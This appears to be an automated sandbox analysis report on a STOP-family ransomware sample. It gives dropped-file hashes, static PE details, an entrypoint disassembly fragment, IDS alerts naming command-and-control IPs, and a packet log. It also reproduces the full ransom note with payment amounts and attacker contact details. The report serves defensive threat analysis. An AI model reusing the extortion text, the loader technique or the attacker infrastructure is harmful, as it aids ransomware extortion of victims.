                  Preview:<?xml.......<0.*.v`..e....g'......m.HvK.L..<.;.....H.).3.h.|...X Y..(l!..u{.UE..K.....k...U7...4...O...t;f.....[.QG3.........`........f.........M^q.a...Z.HB#.,.DG.H.aZt.G...4..&...s...{J]..m......................~....Z83..........)0(=.k6a..)..${..\.?+..I..=.e..k?.{.S..J.Bx_..u....`T.X.+.f.'m...Q.....`...?..kyT=..w...?....5.;W.b.*y.w..Y7do/.l.Po/.Y.._E..a.......IW.y.oE....@.....K..i.(.e....i......@a..\..;Ce.&=....RJ.G%.,.C.t..qT.9n..=D.B..X2j..PW...P7.&o.d...k+..~...H.e }^..~...P..........0G.K...!.f..B..t......*......l?q....,..:.p_.=.-VN...3]...^.......iq...K..p.....|V.^.'.A!;......vAG.m.}< Q..u$...v.!...................+....0V.*.Q..[g....0g..Up...x*M.N`.....-.x.JR.T._H.....Y&....v8..+ags.p...r... .t.V.......a....-.DC7.pB[.....j...x.....4p...S..#..4&4...9......~M..qJ.]..<x-.\`........X._g[.?_....sK..qw...f..g/...#..x.SD...y...{..n....-(.j`..X. .q...1C.V..kid....sx......D..>1.0 .f+5..Z...Aj.t.RLP....r...n,..!d+N....Q..).6.N.q...G..;.&...

                  C:\Users\jones\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1193
                  Entropy (8bit):7.819981402186221
                  Encrypted:false
                  SSDEEP:24:Z/plRuyzDMbdd+ITi0CBQaoUP2EOq5923Ruo1qKSTiiA6wn3zbD:ZrRvE5Tij2JqfWOlsn3nD
                  MD5:1B19B39E53AB31A248BEF875D4D1ABF0
                  SHA1:BF6BEE8C44990BDC31726B630DDE12A744D8B1B9
                  SHA-256:E193DFB81AF1EA613A3A6757FDD863BBD06A7D4AAD8CB2997D452CA86B2BE56B
                  SHA-512:9A5320CFFEDC435DEFEA1DF523A5CDED6A763A7334F0773CC7D41380F8B6FD35C313352F086648609D5F5FE59D5947093FA9546976FE3A0EAC321264A0248A12
                  Malicious:false
                  Preview:<?xml.......<0.*.v`..e....g'......m.HvK.L..<.;.....H.).3.h.|...X Y..(l!..u{.UE..K.....k...U7...4...O...t;f.....[.QG3.........`........f.........M^q.a...Z.HB#.,.DG.H.aZt.G...4..&...s...{J]..m......................~....Z83..........)0(=.k6a..)..${..\.?+..I..=.e..k?.{.S..J.Bx_..u....`T.X.+.f.'m...Q.....`...?..kyT=..w...?....5.;W.b.*y.w..Y7do/.l.Po/.Y.._E..a.......IW.y.oE....@.....K..i.(.e....i......@a..\..;Ce.&=....RJ.G%.,.C.t..qT.9n..=D.B..X2j..PW...P7.&o.d...k+..~...H.e }^..~...P..........0G.K...!.f..B..t......*......l?q....,..:.p_.=.-VN...3]...^.......iq...K..p.....|V.^.'.A!;......vAG.m.}< Q..u$...v.!...................+....0V.*.Q..[g....0g..Up...x*M.N`.....-.x.JR.T._H.....Y&....v8..+ags.p...r... .t.V.......a....-.DC7.pB[.....j...x.....4p...S..#..4&4...9......~M..qJ.]..<x-.\`........X._g[.?_....sK..qw...f..g/...#..x.SD...y...{..n....-(.j`..X. .q...1C.V..kid....sx......D..>1.0 .f+5..Z...Aj.t.RLP....r...n,..!d+N....Q..).6.N.q...G..;.&...

                  C:\Users\jones\SendTo\Bluetooth File Transfer.LNK.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1383
                  Entropy (8bit):7.86992044249279
                  Encrypted:false
                  SSDEEP:24:em700TJXgOxsT9Dl7lBd0m0S6OEOIFb4Y4ROZGb2MHv7RRMT3zbD:M6Xg3p7lz0m0S6ONXPRx2W7RRMT3nD
                  MD5:73F1EDE073AF2F94D015E96B276F2428
                  SHA1:8240EB6D5A616432CDF4013750CF493D70E48DDC
                  SHA-256:7A0A3C9EC141C118C388938DC4B7C1F821F7AF43B02B61A6F8E7A02FFB8C5700
                  SHA-512:47A7854D69320F231D1AC0BD00F7B9CC15A4D4C1C709071FFF9DCECB463A7EE4101472EC8A23916FFEF6712C3442357DBF6C63C93931777C162E4982291A119B
                  Malicious:false
                  Preview:L.......S..8W..LS...ND.J.z..#...(...B.X..'..' p....?.x.1X.i'.h..J.5.q..gvn+......W&......a..q.h...y.i.......R..P}..d....n....... .Akq....fC..|.F)..L5.....C.*s.vF.D...43V.....msp...m....`.y.C.|........Q..6..`P.O&...`.....L..f.[?...kA...i..|.n...!..c#<.v..Fc*\eNz G.!.pi7.t.Z/...~4.ST....z..E7.2]V.lj.o..9.+._..S...O...'...].T.m.h.......F....z1.u....+o..g....k..[,.Q.9..}..P.&q..o.\.4...cN^Nw..C..#.S:-..';H.X.H..).^-.i.>q.yF..CL..d..Rm.........b'..9D...I.R..V"x.VB.;+.E...Z..z..C.....9v.......=..z.vl..~"..?.-.Kc[...4.d..U.......u1...N.v....4'..m\.M.ZF..{..|....=,$....v..w.m`k..=..s^L..i.^..D..G-6..N.c..w%#n3gHU....j,..vZ./..........!....u2OZ...C....o.<.".j.-Bp...7... .T.@f......a ]l\...Z....R.S...X........|..G...)7.^.!..w.....$...z.._8J..G'd6c......^...U.y.5.'..'uj.n....p..D..A.]s.../.}.[..+..aH?.e..L.9..s.n..3W..5;.Kl.H.-..w.>.. .L.m2..S.f...)/ .&l^.......R..:..S.u3<..../d.....}.A_v.$3M.0!...S..DQ......... ...;.....].X..[....,.U.uC.../....b...6\..U.:...

                  C:\Users\jones\SendTo\Desktop (create shortcut).DeskLink.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):341
                  Entropy (8bit):7.319006238613504
                  Encrypted:false
                  SSDEEP:6:o5CTbq4Qc6v2OFwOkkOQpG2eAFGqZqs5ffIck917W36ubz3OsVolWbz6Wcii96Z:k4Qc6eOFwF0p4AFGqZ7fzy17Wqubzx3D
                  MD5:2069B316393323042731A54281487B3E
                  SHA1:E10B8DB40D259D2E59C52E3800D85A7613B086EC
                  SHA-256:DD57A2E30191C272966E172D5E571677880DA63670F8446834DB318125225E8F
                  SHA-512:D6DADF525460F0B7A18FDF1B09436B68754F917EE8D1AC5F6DBA3EBD5A2956FECA45697A1440C7AE83BB5D8CDB6184E633ABE741F78614767D242417954E6DC6
                  Malicious:false
                  Preview:deskt..{.R\H.Z..;...Q.%z.,:.]..w.....@'....Q.l..Ji_...J...q...YA..Z....(.....U.+.y....(....m..A.....Y...........*..cA.......J.e....72..~.~.r.8...F.N.7.i...7qp!.._[.d.si$..oO.?....#.=aU.k......J..La...v&z....6.a..K.v..Fi..1...^.5w.G....6|..........{.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\_readme.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1106
                  Entropy (8bit):4.884025328365006
                  Encrypted:false
                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJx13b:WZHfv0p6WVFPFWrDGT0f/kj53b
                  MD5:35779C10C1797CD75D7E64C8579FED59
                  SHA1:68C0A5BF86F957E8976300A74F20F2785EEE204A
                  SHA-256:ABE1851BFD95CAC28F57A85B9770513ECB91F6A1629F879832AE653BD808CBE5
                  SHA-512:E2A89A0143FBA496DCCE1322CCDF88A576BEBB2F8D0C1EA13D2F5CF288D689DEA27672DCE969CE49AE9740E06C31E8B0FD197A447997D6B54DEEE1F56E483022
                  Malicious:true
                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@sysmail.ch....Reserve e-mail address to

                  C:\Windows\appcompat\Programs\Amcache.hve

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.417068033885432
                  Encrypted:false
                  SSDEEP:6144:Kcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNW5+:ni58oSWIZBk2MM6AFBMo
                  MD5:E99F1B8C673A9DFA9C922C1242B491B7
                  SHA1:963E34480A3686702ADCCC45446FA89204B6F16F
                  SHA-256:D11EDD4975B2B9ECEC8B5E76E00F7A4AE3764D4B6D65FCE5EB7F36B2B6C6588C
                  SHA-512:EAD7C37B91930429CCFDBBD70D79DBA3CD9C786322470C86A6FFDE584D602355E41695F6BE26F419A3BB81FA873699DE427DBAD7BEBE02E9AE957CA265D51A20
                  Malicious:false
                  Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.}...................................................................................................................................................................................................................................................................................................................................................i..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\_readme.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1106
                  Entropy (8bit):4.884025328365006
                  Encrypted:false
                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJx13b:WZHfv0p6WVFPFWrDGT0f/kj53b
                  MD5:35779C10C1797CD75D7E64C8579FED59
                  SHA1:68C0A5BF86F957E8976300A74F20F2785EEE204A
                  SHA-256:ABE1851BFD95CAC28F57A85B9770513ECB91F6A1629F879832AE653BD808CBE5
                  SHA-512:E2A89A0143FBA496DCCE1322CCDF88A576BEBB2F8D0C1EA13D2F5CF288D689DEA27672DCE969CE49AE9740E06C31E8B0FD197A447997D6B54DEEE1F56E483022
                  Malicious:true
                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@sysmail.ch....Reserve e-mail address to

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.764929744411165
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.42%
                  • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                  • Windows Screen Saver (13104/52) 0.13%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  File name:DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File size:810'496 bytes
                  MD5:3a11d47ad1a6093ddfe84e48e77554f3
                  SHA1:bdbce8ed4a6b1347b0f1ad23184709e82ccd0249
                  SHA256:e565c0b80462bd207d991cb9d9fd34c9d72b45e4696797f9d59f0e153b3a54a9
                  SHA512:052f42c4c09f15b5589f9287714d664b0d19b367a7583cc86e250e20728cc7ce4314511210906ce2dd7fdfca595ec6a382c63869b91a6c94b59103889e974149
                  SSDEEP:12288:9/DSCunCjrhA3fJs8ewDpc8b/JaBJjmyBgSxMlHkygSiioboEAIeVu/DjkV+hT6:kOyx5eAHrJaBjBgS4BgSSxeVu/8UG
                  TLSH:5A050210AB90D035E17356F58D7A97ADB52E79A05B24A0CF63D52EEB1734BD0EC3230A
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.d.n.d.n.d.n.6Kn.d.n.6]n.d.n...n.d.n.d.n@d.n.6Zn.d.n.6Jn.d.n.6On.d.nRich.d.n................PE..L...5.._...................

                  File Icon

                  Icon Hash:27dcac9eee276d22

                  Static PE Info

                  General

                  Entrypoint:0x4ed000
                  Entrypoint Section:5ua
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x5F9C8935 [Fri Oct 30 21:44:21 2020 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:27d8a7471ee53dd07acef039b03728e9

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 0000016Ch
                  xor eax, eax
                  push ebx
                  push esi
                  push edi
                  mov dword ptr [ebp-24h], eax
                  mov dword ptr [ebp-10h], eax
                  mov dword ptr [ebp-14h], eax
                  mov dword ptr [ebp-08h], eax
                  mov dword ptr [ebp-0Ch], eax
                  mov dword ptr [ebp-20h], eax
                  mov dword ptr [ebp-18h], eax
                  mov dword ptr [ebp-48h], 66566848h
                  mov dword ptr [ebp-44h], 652E4249h
                  mov dword ptr [ebp-40h], 00006578h
                  mov dword ptr [ebp-3Ch], 00000000h
                  call 00007F72FCCE61C5h
                  pop eax
                  add eax, 00000225h
                  mov dword ptr [ebp-04h], eax
                  mov eax, dword ptr fs:[00000030h]
                  mov dword ptr [ebp-28h], eax
                  mov eax, dword ptr [ebp-04h]
                  mov dword ptr [eax], E904C483h
                  mov eax, dword ptr [ebp-04h]
                  mov dword ptr [eax+04h], FFF1D5EFh
                  mov eax, dword ptr [ebp-28h]
                  mov eax, dword ptr [eax+0Ch]
                  mov eax, dword ptr [eax+1Ch]
                  mov eax, dword ptr [eax]
                  mov eax, dword ptr [eax+08h]
                  mov ecx, dword ptr [eax+3Ch]
                  mov ecx, dword ptr [ecx+eax+78h]
                  add ecx, eax
                  mov edi, dword ptr [ecx+1Ch]
                  mov ebx, dword ptr [ecx+20h]
                  mov esi, dword ptr [ecx+24h]
                  mov ecx, dword ptr [ecx+18h]
                  add esi, eax
                  add edi, eax
                  add ebx, eax
                  xor edx, edx
                  mov dword ptr [ebp-30h], esi
                  mov dword ptr [ebp-1Ch], edx
                  mov dword ptr [ebp-34h], ecx
                  cmp edx, dword ptr [ebp-34h]
                  jnc 00007F72FCCE630Eh
                  movzx ecx, word ptr [esi+edx*2]
                  mov edx, dword ptr [ebx+edx*4]
                  mov esi, dword ptr [edi+ecx*4]
                  add edx, eax
                  mov ecx, dword ptr [edx]
                  add esi, eax
                  cmp ecx, 4D746547h
                  jne 00007F72FCCE6214h
                  cmp dword ptr [edx+04h], 6C75646Fh
                  jne 00007F72FCCE620Bh

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2008 build 21022
                  • [ C ] VS2008 build 21022
                  • [IMP] VS2005 build 50727
                  • [C++] VS2008 build 21022
                  • [RES] VS2008 build 21022
                  • [LNK] VS2008 build 21022

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x24f740x3c.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe30000x93c0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x13000x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x7dc00x40.text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x2b0.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x24f9c0x250001f2e7f3d5ba8b7e636472331cdc50462False0.4164907094594595data6.146370361355982IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0x260000xbc2400x934007e251054f83631c504a2ea28a5a3fc38False0.9872582634762309data7.983035326955852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xe30000x93c00x9400f47fe6e81386a43e4a16a71eac92634eFalse0.6379856418918919data6.365417965877006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  5ua0xed0000x50000x4200efdc007e88df13ae7f11931dd363dfabFalse0.7775804924242424data6.934599559139523IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  HEPIYIWENIMOMACAMAKA0xe9ed80xee8ASCII text, with very long lines (3816), with no line terminatorsUzbekItaly0.59958071278826
                  ZUKAMAJIMERO0xeadc00xd96ASCII text, with very long lines (3478), with no line terminatorsUzbekItaly0.5960322024151812
                  RT_ICON0xe34900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0UzbekItaly0.5166967509025271
                  RT_ICON0xe3d380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0UzbekItaly0.5887096774193549
                  RT_ICON0xe44000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0UzbekItaly0.5765895953757225
                  RT_ICON0xe49680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0UzbekItaly0.6106941838649156
                  RT_ICON0xe5a100x988Device independent bitmap graphic, 24 x 48 x 32, image size 0UzbekItaly0.5868852459016394
                  RT_ICON0xe63980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0UzbekItaly0.6320921985815603
                  RT_ICON0xe68600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0UzbekItaly0.7476141078838174
                  RT_ICON0xe8e080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0UzbekItaly0.8344277673545967
                  RT_STRING0xebce80xa8dataUzbekItaly0.6666666666666666
                  RT_STRING0xebd900x2f2dataUzbekItaly0.46551724137931033
                  RT_STRING0xec0880x15edataUzbekItaly0.5457142857142857
                  RT_STRING0xec1e80x1d6dataUzbekItaly0.5127659574468085
                  RT_ACCELERATOR0xebb780x30dataUzbekItaly0.9791666666666666
                  RT_ACCELERATOR0xebb580x20dataUzbekItaly1.09375
                  RT_GROUP_ICON0xe9eb00x22dataUzbekItaly1.0294117647058822
                  RT_GROUP_ICON0xe68000x5adataUzbekItaly0.7222222222222222
                  RT_VERSION0xebba80x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79UzbekItaly0.603125

                  Imports

                  DLLImport
                  KERNEL32.dllLoadLibraryA, CreateMutexW, SetLocaleInfoW, FindNextVolumeW, GetNamedPipeHandleStateA, LocalFileTimeToFileTime, EnumResourceTypesW, EnumResourceNamesW, FillConsoleOutputCharacterA, CreateTimerQueueTimer, TerminateProcess, SetEvent, FindNextFileA, GetCompressedFileSizeA, CopyFileExW, BuildCommDCBW, VerifyVersionInfoA, FreeResource, SetLastError, GetVersionExA, ReadConsoleOutputCharacterA, SetDefaultCommConfigW, VerLanguageNameW, GetCommConfig, WritePrivateProfileStructW, LocalFree, CreateTimerQueue, FindNextVolumeMountPointA, ResetWriteWatch, WriteConsoleInputA, LoadResource, AddAtomW, InitAtomTable, GetThreadPriority, CallNamedPipeA, GetDriveTypeW, BuildCommDCBAndTimeoutsA, VirtualProtect, GlobalAlloc, VerifyVersionInfoW, InterlockedExchange, FindFirstChangeNotificationW, SearchPathW, FormatMessageW, SetDllDirectoryW, GetModuleHandleA, WritePrivateProfileStringA, GetUserDefaultLCID, TerminateThread, GlobalUnfix, SetConsoleWindowInfo, InterlockedDecrement, GetStartupInfoA, GetSystemWow64DirectoryW, CopyFileA, GetPrivateProfileIntA, SetCalendarInfoW, DebugBreak, SetConsoleCursorInfo, FreeLibraryAndExitThread, GetModuleFileNameA, SetConsoleScreenBufferSize, WaitForDebugEvent, InterlockedExchangeAdd, GetOEMCP, GetPrivateProfileStringW, CreateActCtxA, GetPrivateProfileIntW, ReadConsoleInputW, OutputDebugStringW, SetThreadAffinityMask, FlushConsoleInputBuffer, lstrlenA, WriteConsoleW, OpenMutexW, GetThreadContext, DeleteCriticalSection, QueryDepthSList, ConvertFiberToThread, SetProcessPriorityBoost, LockFile, FreeEnvironmentStringsA, GetConsoleCP, CreateIoCompletionPort, AllocConsole, GlobalGetAtomNameW, SetComputerNameA, GetConsoleAliasExesLengthA, CreateMailslotW, GetCommState, MoveFileWithProgressW, GetSystemTimeAdjustment, EnumSystemLocalesA, GetLastError, OpenWaitableTimerW, OpenFileMappingW, GetFileSizeEx, GetConsoleAliasesLengthW, SetProcessShutdownParameters, FillConsoleOutputCharacterW, WriteConsoleOutputCharacterA, GetNumberFormatA, BuildCommDCBAndTimeoutsW, GetConsoleAliasExesA, GetBinaryTypeW, GetModuleHandleW, Sleep, InterlockedIncrement, GetProcAddress, ExitProcess, MoveFileA, DeleteFileA, RaiseException, GetStartupInfoW, HeapValidate, IsBadReadPtr, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, WriteFile, GetStdHandle, GetACP, GetCPInfo, IsValidCodePage, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, HeapFree, VirtualFree, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, OutputDebugStringA, LoadLibraryW, WideCharToMultiByte, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA
                  USER32.dllCharUpperW

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  UzbekItaly

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-07-26T02:08:16.940420+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6396453192.168.2.71.1.1.1
                  2024-07-26T02:09:13.452169+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity4973180192.168.2.792.246.89.93
                  2024-07-26T02:08:40.407516+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49725443192.168.2.7188.114.97.3
                  2024-07-26T02:08:20.342806+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49703799192.168.2.744.221.84.105
                  2024-07-26T02:08:34.362546+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971713.85.23.86192.168.2.7
                  2024-07-26T02:10:03.175249+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973680192.168.2.792.246.89.93
                  2024-07-26T02:08:32.511346+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49715443192.168.2.7188.114.97.3
                  2024-07-26T02:09:12.056798+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973213.85.23.86192.168.2.7
                  2024-07-26T02:09:36.695274+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4973480192.168.2.792.246.89.93
                  2024-07-26T02:08:40.821957+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49726443192.168.2.7188.114.97.3
                  2024-07-26T02:10:06.347356+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity4973780192.168.2.792.246.89.93
                  2024-07-26T02:09:39.873831+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity4973580192.168.2.792.246.89.93
                  2024-07-26T02:08:47.048697+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity4971380192.168.2.792.246.89.93
                  2024-07-26T02:08:43.842682+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload4970680192.168.2.792.246.89.93
                  2024-07-26T02:08:43.883544+0200TCP2036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key4970580192.168.2.792.246.89.93
                  2024-07-26T02:08:22.237053+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49704443192.168.2.7188.114.97.3
                  2024-07-26T02:08:17.933192+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6396453192.168.2.71.1.1.1
                  2024-07-26T02:08:15.901932+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6396453192.168.2.71.1.1.1
                  2024-07-26T02:08:25.591095+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49709443192.168.2.7188.114.97.3
                  2024-07-26T02:08:18.857235+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49702443192.168.2.7188.114.97.3
                  2024-07-26T02:09:05.270645+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload4972980192.168.2.792.246.89.93
                  2024-07-26T02:09:10.250094+0200TCP2036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key4973080192.168.2.792.246.89.93

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 26, 2024 02:08:17.670238018 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:17.670286894 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:17.670363903 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:17.699527025 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:17.699558973 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.206446886 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.206541061 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.330926895 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.330944061 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.331340075 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.331387043 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.335596085 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.376524925 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.857281923 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.857381105 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:18.857383966 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.857431889 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.863059044 CEST49702443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:18.863105059 CEST44349702188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:19.932753086 CEST49703799192.168.2.744.221.84.105
                  Jul 26, 2024 02:08:19.939376116 CEST7994970344.221.84.105192.168.2.7
                  Jul 26, 2024 02:08:19.939469099 CEST49703799192.168.2.744.221.84.105
                  Jul 26, 2024 02:08:19.939889908 CEST49703799192.168.2.744.221.84.105
                  Jul 26, 2024 02:08:19.946283102 CEST7994970344.221.84.105192.168.2.7
                  Jul 26, 2024 02:08:20.342746019 CEST7994970344.221.84.105192.168.2.7
                  Jul 26, 2024 02:08:20.342806101 CEST49703799192.168.2.744.221.84.105
                  Jul 26, 2024 02:08:20.352673054 CEST7994970344.221.84.105192.168.2.7
                  Jul 26, 2024 02:08:20.352715969 CEST49703799192.168.2.744.221.84.105
                  Jul 26, 2024 02:08:20.355206966 CEST49703799192.168.2.744.221.84.105
